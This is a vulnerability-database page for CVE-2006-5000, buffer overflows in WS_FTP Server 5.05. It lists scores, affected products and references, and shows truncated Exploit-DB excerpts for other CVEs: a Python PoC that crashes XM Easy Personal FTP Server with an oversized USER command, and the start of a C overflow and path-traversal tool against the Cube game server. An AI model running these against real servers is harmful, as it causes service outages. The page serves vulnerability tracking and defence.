CVE-2006-5000
published 2006-09-26CVE-2006-5000: Multiple buffer overflows in WS_FTP Server 5.05 before Hotfix 1, and possibly other versions down to 5.0, have unknown impact and remote authenticated attack…
PriorityP343medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EPSS
63.84%
99.1th percentile
Multiple buffer overflows in WS_FTP Server 5.05 before Hotfix 1, and possibly other versions down to 5.0, have unknown impact and remote authenticated attack vectors via the (1) XCRC, (2) XMD5, and (3) XSHA1 commands. NOTE: in the early publication of this identifier on 20060926, the description was used for the wrong issue.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ipswitch | ws_ftp_server | — | — |
| ipswitch | ws_ftp_server | — | — |
| ipswitch | ws_ftp_server | — | — |
| progress | ws_ftp_server | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)
exploitdb·2006-05-04
CVE-2006-2225 XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)
XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)
---
##############################################################
# XM EASY PERSONAL FTP SERVER v4.3 #
# http://www.securityfocus.com/archive/1/432960/30/0/threaded#
# Buffer Overflow Vulnerability PoC #
# [email protected] #
##############################################################
import socket
import struct
import time
import sys
buff='USER '+'A'*5000+'\r\n'
if len(sys.argv)!=3:
print "[+] Usage: %s \n" %sys.argv[0]
sys.exit(0)
try:
print "[+] Connecting to %s" %sys.argv[1]
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((sys.argv[1],int(sys.argv[2])))
print "[+] Sending Evil buffer"
time.sleep(1)
s.send(buff)
print "[+] Service Crashed"
s.recv(1024)
except:
print "[+] Could Not Co
Exploit-DB
Cube 2005_08_29 - Multiple Buffer Overflow / Crash
exploitdb·2006-03-06
CVE-2006-1101 Cube 2005_08_29 - Multiple Buffer Overflow / Crash
Cube 2005_08_29 - Multiple Buffer Overflow / Crash
---
/*
by Luigi Auriemma
You NEED Enet for compiling this tool (then remember -lenet)
http://enet.bespin.org / http://enet.cubik.org
*/
#include
#include
#include
#include
#define VER "0.1"
#define PORT 28765
#define MAXTRANS 5000
#define BOFSZ (MAXTRANS + 2400)
#define MAPSUX "base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../base/../readme.txt"
// when encoding is activated (all the pre-compiled client/server) the valid
// tag types are 0, 9, 11, 18, 19, 20, 23, 24, 26, 31 instead of the following
// values
enum {
SV_INITS2C, SV_INITC2S, SV_POS, SV
No writeups or analysis indexed.
http://securitytracker.com/id?1016935http://www.ipswitch.com/support/ws_ftp-server/releases/wr505hf1.asphttp://www.securityfocus.com/archive/1/447077/100/0/threadedhttp://www.zerodayinitiative.com/advisories/ZDI-06-029.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/41829http://securitytracker.com/id?1016935http://www.ipswitch.com/support/ws_ftp-server/releases/wr505hf1.asphttp://www.securityfocus.com/archive/1/447077/100/0/threadedhttp://www.zerodayinitiative.com/advisories/ZDI-06-029.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/41829
2006-09-26
Published